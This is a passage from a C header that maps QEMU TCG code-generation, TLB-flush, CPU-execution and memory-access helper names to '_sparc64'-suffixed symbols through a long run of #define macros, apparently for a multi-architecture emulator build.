tcg_gen_andi_i32_sparc64 #define tcg_gen_ori_i32 tcg_gen_ori_i32_sparc64 #define tcg_gen_xori_i32 tcg_gen_xori_i32_sparc64 #define tcg_gen_shli_i32 tcg_gen_shli_i32_sparc64 #define tcg_gen_shri_i32 tcg_gen_shri_i32_sparc64 #define tcg_gen_sari_i32 tcg_gen_sari_i32_sparc64 #define tcg_gen_brcond_i32 tcg_gen_brcond_i32_sparc64 
#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_sparc64 #define tcg_gen_setcond_i32 tcg_gen_setcond_i32_sparc64 #define tcg_gen_setcondi_i32 tcg_gen_setcondi_i32_sparc64 #define tcg_gen_muli_i32 tcg_gen_muli_i32_sparc64 #define tcg_gen_div_i32 tcg_gen_div_i32_sparc64 #define tcg_gen_rem_i32 tcg_gen_rem_i32_sparc64 #define tcg_gen_divu_i32 tcg_gen_divu_i32_sparc64 #define tcg_gen_remu_i32 tcg_gen_remu_i32_sparc64 #define tcg_gen_andc_i32 tcg_gen_andc_i32_sparc64 #define tcg_gen_eqv_i32 tcg_gen_eqv_i32_sparc64 #define tcg_gen_nand_i32 tcg_gen_nand_i32_sparc64 #define tcg_gen_nor_i32 tcg_gen_nor_i32_sparc64 #define tcg_gen_orc_i32 tcg_gen_orc_i32_sparc64 #define tcg_gen_clz_i32 tcg_gen_clz_i32_sparc64 #define tcg_gen_clzi_i32 tcg_gen_clzi_i32_sparc64 #define tcg_gen_ctz_i32 tcg_gen_ctz_i32_sparc64 #define tcg_gen_ctzi_i32 tcg_gen_ctzi_i32_sparc64 #define tcg_gen_clrsb_i32 tcg_gen_clrsb_i32_sparc64 #define tcg_gen_ctpop_i32 tcg_gen_ctpop_i32_sparc64 #define tcg_gen_rotl_i32 tcg_gen_rotl_i32_sparc64 #define tcg_gen_rotli_i32 tcg_gen_rotli_i32_sparc64 #define tcg_gen_rotr_i32 tcg_gen_rotr_i32_sparc64 #define tcg_gen_rotri_i32 tcg_gen_rotri_i32_sparc64 #define tcg_gen_deposit_i32 tcg_gen_deposit_i32_sparc64 #define tcg_gen_deposit_z_i32 tcg_gen_deposit_z_i32_sparc64 #define tcg_gen_extract_i32 tcg_gen_extract_i32_sparc64 #define tcg_gen_sextract_i32 tcg_gen_sextract_i32_sparc64 #define tcg_gen_extract2_i32 tcg_gen_extract2_i32_sparc64 #define tcg_gen_movcond_i32 tcg_gen_movcond_i32_sparc64 #define tcg_gen_add2_i32 tcg_gen_add2_i32_sparc64 #define tcg_gen_sub2_i32 tcg_gen_sub2_i32_sparc64 #define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_sparc64 #define tcg_gen_muls2_i32 tcg_gen_muls2_i32_sparc64 #define tcg_gen_mulsu2_i32 tcg_gen_mulsu2_i32_sparc64 #define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_sparc64 #define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_sparc64 #define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_sparc64 #define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_sparc64 #define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_sparc64 #define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_sparc64 #define tcg_gen_smin_i32 tcg_gen_smin_i32_sparc64 #define tcg_gen_umin_i32 tcg_gen_umin_i32_sparc64 #define tcg_gen_smax_i32 tcg_gen_smax_i32_sparc64 #define tcg_gen_umax_i32 tcg_gen_umax_i32_sparc64 #define tcg_gen_abs_i32 tcg_gen_abs_i32_sparc64 #define tcg_gen_addi_i64 tcg_gen_addi_i64_sparc64 #define tcg_gen_subfi_i64 tcg_gen_subfi_i64_sparc64 #define tcg_gen_subi_i64 tcg_gen_subi_i64_sparc64 #define tcg_gen_andi_i64 tcg_gen_andi_i64_sparc64 #define tcg_gen_ori_i64 tcg_gen_ori_i64_sparc64 #define tcg_gen_xori_i64 tcg_gen_xori_i64_sparc64 #define tcg_gen_shli_i64 tcg_gen_shli_i64_sparc64 #define tcg_gen_shri_i64 tcg_gen_shri_i64_sparc64 #define tcg_gen_sari_i64 tcg_gen_sari_i64_sparc64 #define tcg_gen_brcond_i64 tcg_gen_brcond_i64_sparc64 #define tcg_gen_brcondi_i64 tcg_gen_brcondi_i64_sparc64 #define tcg_gen_setcond_i64 tcg_gen_setcond_i64_sparc64 #define tcg_gen_setcondi_i64 tcg_gen_setcondi_i64_sparc64 #define tcg_gen_muli_i64 tcg_gen_muli_i64_sparc64 #define tcg_gen_div_i64 tcg_gen_div_i64_sparc64 #define tcg_gen_rem_i64 tcg_gen_rem_i64_sparc64 #define tcg_gen_divu_i64 tcg_gen_divu_i64_sparc64 #define tcg_gen_remu_i64 tcg_gen_remu_i64_sparc64 #define tcg_gen_ext8s_i64 tcg_gen_ext8s_i64_sparc64 #define tcg_gen_ext16s_i64 tcg_gen_ext16s_i64_sparc64 #define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_sparc64 #define tcg_gen_ext8u_i64 tcg_gen_ext8u_i64_sparc64 #define tcg_gen_ext16u_i64 tcg_gen_ext16u_i64_sparc64 #define tcg_gen_ext32u_i64 
tcg_gen_ext32u_i64_sparc64 #define tcg_gen_bswap16_i64 tcg_gen_bswap16_i64_sparc64 #define tcg_gen_bswap32_i64 tcg_gen_bswap32_i64_sparc64 #define tcg_gen_bswap64_i64 tcg_gen_bswap64_i64_sparc64 #define tcg_gen_not_i64 tcg_gen_not_i64_sparc64 #define tcg_gen_andc_i64 tcg_gen_andc_i64_sparc64 #define tcg_gen_eqv_i64 tcg_gen_eqv_i64_sparc64 #define tcg_gen_nand_i64 tcg_gen_nand_i64_sparc64 #define tcg_gen_nor_i64 tcg_gen_nor_i64_sparc64 #define tcg_gen_orc_i64 tcg_gen_orc_i64_sparc64 #define tcg_gen_clz_i64 tcg_gen_clz_i64_sparc64 #define tcg_gen_clzi_i64 tcg_gen_clzi_i64_sparc64 #define tcg_gen_ctz_i64 tcg_gen_ctz_i64_sparc64 #define tcg_gen_ctzi_i64 tcg_gen_ctzi_i64_sparc64 #define tcg_gen_clrsb_i64 tcg_gen_clrsb_i64_sparc64 #define tcg_gen_ctpop_i64 tcg_gen_ctpop_i64_sparc64 #define tcg_gen_rotl_i64 tcg_gen_rotl_i64_sparc64 #define tcg_gen_rotli_i64 tcg_gen_rotli_i64_sparc64 #define tcg_gen_rotr_i64 tcg_gen_rotr_i64_sparc64 #define tcg_gen_rotri_i64 tcg_gen_rotri_i64_sparc64 #define tcg_gen_deposit_i64 tcg_gen_deposit_i64_sparc64 #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_sparc64 #define tcg_gen_extract_i64 tcg_gen_extract_i64_sparc64 #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_sparc64 #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_sparc64 #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_sparc64 #define tcg_gen_add2_i64 tcg_gen_add2_i64_sparc64 #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_sparc64 #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_sparc64 #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_sparc64 #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_sparc64 #define tcg_gen_smin_i64 tcg_gen_smin_i64_sparc64 #define tcg_gen_umin_i64 tcg_gen_umin_i64_sparc64 #define tcg_gen_smax_i64 tcg_gen_smax_i64_sparc64 #define tcg_gen_umax_i64 tcg_gen_umax_i64_sparc64 #define tcg_gen_abs_i64 tcg_gen_abs_i64_sparc64 #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_sparc64 #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_sparc64 #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_sparc64 #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_sparc64 #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_sparc64 #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_sparc64 #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_sparc64 #define tcg_gen_exit_tb tcg_gen_exit_tb_sparc64 #define tcg_gen_goto_tb tcg_gen_goto_tb_sparc64 #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_sparc64 #define check_exit_request check_exit_request_sparc64 #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_sparc64 #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_sparc64 #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_sparc64 #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_sparc64 #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_sparc64 #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_sparc64 #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_sparc64 #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_sparc64 #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_sparc64 #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_sparc64 #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_sparc64 #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_sparc64 #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_sparc64 #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_sparc64 #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_sparc64 #define tcg_gen_atomic_fetch_smin_i64 
tcg_gen_atomic_fetch_smin_i64_sparc64 #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_sparc64 #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_sparc64 #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_sparc64 #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_sparc64 #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_sparc64 #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_sparc64 #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_sparc64 #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_sparc64 #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_sparc64 #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_sparc64 #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_sparc64 #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_sparc64 #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_sparc64 #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_sparc64 #define tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_sparc64 #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_sparc64 #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_sparc64 #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_sparc64 #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_sparc64 #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_sparc64 #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_sparc64 #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_sparc64 #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_sparc64 #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_sparc64 #define simd_desc simd_desc_sparc64 #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_sparc64 #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_sparc64 #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_sparc64 #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_sparc64 #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_sparc64 #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_sparc64 #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_sparc64 #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_sparc64 #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_sparc64 #define tcg_gen_gvec_2 tcg_gen_gvec_2_sparc64 #define tcg_gen_gvec_2i tcg_gen_gvec_2i_sparc64 #define tcg_gen_gvec_2s tcg_gen_gvec_2s_sparc64 #define tcg_gen_gvec_3 tcg_gen_gvec_3_sparc64 #define tcg_gen_gvec_3i tcg_gen_gvec_3i_sparc64 #define tcg_gen_gvec_4 tcg_gen_gvec_4_sparc64 #define tcg_gen_gvec_mov tcg_gen_gvec_mov_sparc64 #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_sparc64 #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_sparc64 #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_sparc64 #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_sparc64 #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_sparc64 #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_sparc64 #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_sparc64 #define tcg_gen_gvec_not tcg_gen_gvec_not_sparc64 #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_sparc64 #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_sparc64 #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_sparc64 #define tcg_gen_gvec_add tcg_gen_gvec_add_sparc64 #define tcg_gen_gvec_adds tcg_gen_gvec_adds_sparc64 #define tcg_gen_gvec_addi tcg_gen_gvec_addi_sparc64 #define tcg_gen_gvec_subs tcg_gen_gvec_subs_sparc64 #define tcg_gen_vec_sub8_i64 
tcg_gen_vec_sub8_i64_sparc64 #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_sparc64 #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_sparc64 #define tcg_gen_gvec_sub tcg_gen_gvec_sub_sparc64 #define tcg_gen_gvec_mul tcg_gen_gvec_mul_sparc64 #define tcg_gen_gvec_muls tcg_gen_gvec_muls_sparc64 #define tcg_gen_gvec_muli tcg_gen_gvec_muli_sparc64 #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_sparc64 #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_sparc64 #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_sparc64 #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_sparc64 #define tcg_gen_gvec_smin tcg_gen_gvec_smin_sparc64 #define tcg_gen_gvec_umin tcg_gen_gvec_umin_sparc64 #define tcg_gen_gvec_smax tcg_gen_gvec_smax_sparc64 #define tcg_gen_gvec_umax tcg_gen_gvec_umax_sparc64 #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_sparc64 #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_sparc64 #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_sparc64 #define tcg_gen_gvec_neg tcg_gen_gvec_neg_sparc64 #define tcg_gen_gvec_abs tcg_gen_gvec_abs_sparc64 #define tcg_gen_gvec_and tcg_gen_gvec_and_sparc64 #define tcg_gen_gvec_or tcg_gen_gvec_or_sparc64 #define tcg_gen_gvec_xor tcg_gen_gvec_xor_sparc64 #define tcg_gen_gvec_andc tcg_gen_gvec_andc_sparc64 #define tcg_gen_gvec_orc tcg_gen_gvec_orc_sparc64 #define tcg_gen_gvec_nand tcg_gen_gvec_nand_sparc64 #define tcg_gen_gvec_nor tcg_gen_gvec_nor_sparc64 #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_sparc64 #define tcg_gen_gvec_ands tcg_gen_gvec_ands_sparc64 #define tcg_gen_gvec_andi tcg_gen_gvec_andi_sparc64 #define tcg_gen_gvec_xors tcg_gen_gvec_xors_sparc64 #define tcg_gen_gvec_xori tcg_gen_gvec_xori_sparc64 #define tcg_gen_gvec_ors tcg_gen_gvec_ors_sparc64 #define tcg_gen_gvec_ori tcg_gen_gvec_ori_sparc64 #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_sparc64 #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_sparc64 #define tcg_gen_gvec_shli tcg_gen_gvec_shli_sparc64 #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_sparc64 #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_sparc64 #define tcg_gen_gvec_shri tcg_gen_gvec_shri_sparc64 #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_sparc64 #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_sparc64 #define tcg_gen_gvec_sari tcg_gen_gvec_sari_sparc64 #define tcg_gen_gvec_shls tcg_gen_gvec_shls_sparc64 #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_sparc64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_sparc64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_sparc64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_sparc64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_sparc64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_sparc64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_sparc64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_sparc64 #define vec_gen_2 vec_gen_2_sparc64 #define vec_gen_3 vec_gen_3_sparc64 #define vec_gen_4 vec_gen_4_sparc64 #define tcg_gen_mov_vec tcg_gen_mov_vec_sparc64 #define tcg_const_zeros_vec tcg_const_zeros_vec_sparc64 #define tcg_const_ones_vec tcg_const_ones_vec_sparc64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_sparc64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_sparc64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_sparc64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_sparc64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_sparc64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_sparc64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_sparc64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_sparc64 #define tcg_gen_dup_i32_vec 
tcg_gen_dup_i32_vec_sparc64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_sparc64 #define tcg_gen_ld_vec tcg_gen_ld_vec_sparc64 #define tcg_gen_st_vec tcg_gen_st_vec_sparc64 #define tcg_gen_stl_vec tcg_gen_stl_vec_sparc64 #define tcg_gen_and_vec tcg_gen_and_vec_sparc64 #define tcg_gen_or_vec tcg_gen_or_vec_sparc64 #define tcg_gen_xor_vec tcg_gen_xor_vec_sparc64 #define tcg_gen_andc_vec tcg_gen_andc_vec_sparc64 #define tcg_gen_orc_vec tcg_gen_orc_vec_sparc64 #define tcg_gen_nand_vec tcg_gen_nand_vec_sparc64 #define tcg_gen_nor_vec tcg_gen_nor_vec_sparc64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_sparc64 #define tcg_gen_not_vec tcg_gen_not_vec_sparc64 #define tcg_gen_neg_vec tcg_gen_neg_vec_sparc64 #define tcg_gen_abs_vec tcg_gen_abs_vec_sparc64 #define tcg_gen_shli_vec tcg_gen_shli_vec_sparc64 #define tcg_gen_shri_vec tcg_gen_shri_vec_sparc64 #define tcg_gen_sari_vec tcg_gen_sari_vec_sparc64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_sparc64 #define tcg_gen_add_vec tcg_gen_add_vec_sparc64 #define tcg_gen_sub_vec tcg_gen_sub_vec_sparc64 #define tcg_gen_mul_vec tcg_gen_mul_vec_sparc64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_sparc64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_sparc64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_sparc64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_sparc64 #define tcg_gen_smin_vec tcg_gen_smin_vec_sparc64 #define tcg_gen_umin_vec tcg_gen_umin_vec_sparc64 #define tcg_gen_smax_vec tcg_gen_smax_vec_sparc64 #define tcg_gen_umax_vec tcg_gen_umax_vec_sparc64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_sparc64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_sparc64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_sparc64 #define tcg_gen_shls_vec tcg_gen_shls_vec_sparc64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_sparc64 #define tcg_gen_sars_vec tcg_gen_sars_vec_sparc64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_sparc64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_sparc64 #define tb_htable_lookup tb_htable_lookup_sparc64 #define tb_set_jmp_target tb_set_jmp_target_sparc64 #define cpu_exec cpu_exec_sparc64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_sparc64 #define cpu_reloading_memory_map cpu_reloading_memory_map_sparc64 #define cpu_loop_exit cpu_loop_exit_sparc64 #define cpu_loop_exit_restore cpu_loop_exit_restore_sparc64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_sparc64 #define tlb_init tlb_init_sparc64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_sparc64 #define tlb_flush tlb_flush_sparc64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_sparc64 #define tlb_flush_all_cpus tlb_flush_all_cpus_sparc64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_sparc64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_sparc64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_sparc64 #define tlb_flush_page tlb_flush_page_sparc64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_sparc64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_sparc64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_sparc64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_sparc64 #define tlb_protect_code tlb_protect_code_sparc64 #define tlb_unprotect_code tlb_unprotect_code_sparc64 #define tlb_reset_dirty tlb_reset_dirty_sparc64 #define tlb_set_dirty tlb_set_dirty_sparc64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_sparc64 #define tlb_set_page tlb_set_page_sparc64 #define get_page_addr_code_hostp get_page_addr_code_hostp_sparc64 #define 
get_page_addr_code get_page_addr_code_sparc64 #define probe_access probe_access_sparc64 #define tlb_vaddr_to_host tlb_vaddr_to_host_sparc64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_sparc64 #define helper_le_lduw_mmu helper_le_lduw_mmu_sparc64 #define helper_be_lduw_mmu helper_be_lduw_mmu_sparc64 #define helper_le_ldul_mmu helper_le_ldul_mmu_sparc64 #define helper_be_ldul_mmu helper_be_ldul_mmu_sparc64 #define helper_le_ldq_mmu helper_le_ldq_mmu_sparc64 #define helper_be_ldq_mmu helper_be_ldq_mmu_sparc64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_sparc64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_sparc64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_sparc64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_sparc64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_sparc64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_sparc64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_sparc64 #define cpu_ldub_data_ra cpu_ldub_data_ra_sparc64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_sparc64 #define cpu_lduw_data_ra cpu_lduw_data_ra_sparc64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_sparc64 #define cpu_ldl_data_ra cpu_ldl_data_ra_sparc64 #define cpu_ldq_data_ra cpu_ldq_data_ra_sparc64 #define cpu_ldub_data cpu_ldub_data_sparc64 #define cpu_ldsb_data cpu_ldsb_data_sparc64 #define cpu_lduw_data cpu_lduw_data_sparc64 #define cpu_ldsw_data cpu_ldsw_data_sparc64 #define cpu_ldl_data cpu_ldl_data_sparc64 #define cpu_ldq_data cpu_ldq_data_sparc64 #define helper_ret_stb_mmu helper_ret_stb_mmu_sparc64 #define helper_le_stw_mmu helper_le_stw_mmu_sparc64 #define helper_be_stw_mmu helper_be_stw_mmu_sparc64 #define helper_le_stl_mmu helper_le_stl_mmu_sparc64 #define helper_be_stl_mmu helper_be_stl_mmu_sparc64 #define helper_le_stq_mmu helper_le_stq_mmu_sparc64 #define helper_be_stq_mmu helper_be_stq_mmu_sparc64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_sparc64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_sparc64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_sparc64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_sparc64 #define cpu_stb_data_ra cpu_stb_data_ra_sparc64 #define cpu_stw_data_ra cpu_stw_data_ra_sparc64 #define cpu_stl_data_ra cpu_stl_data_ra_sparc64 #define cpu_stq_data_ra cpu_stq_data_ra_sparc64 #define cpu_stb_data cpu_stb_data_sparc64 #define cpu_stw_data cpu_stw_data_sparc64 #define cpu_stl_data cpu_stl_data_sparc64 #define cpu_stq_data cpu_stq_data_sparc64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_sparc64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_sparc64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_sparc64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_sparc64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_sparc64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_sparc64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_sparc64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_sparc64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_sparc64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_sparc64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_sparc64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_sparc64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_sparc64 
#define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_sparc64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_sparc64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_sparc64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_sparc64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_sparc64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_sparc64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_sparc64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_sparc64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_sparc64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_sparc64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_sparc64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_sparc64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_sparc64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_sparc64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_sparc64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_sparc64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_sparc64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_sparc64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_sparc64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_sparc64 #define 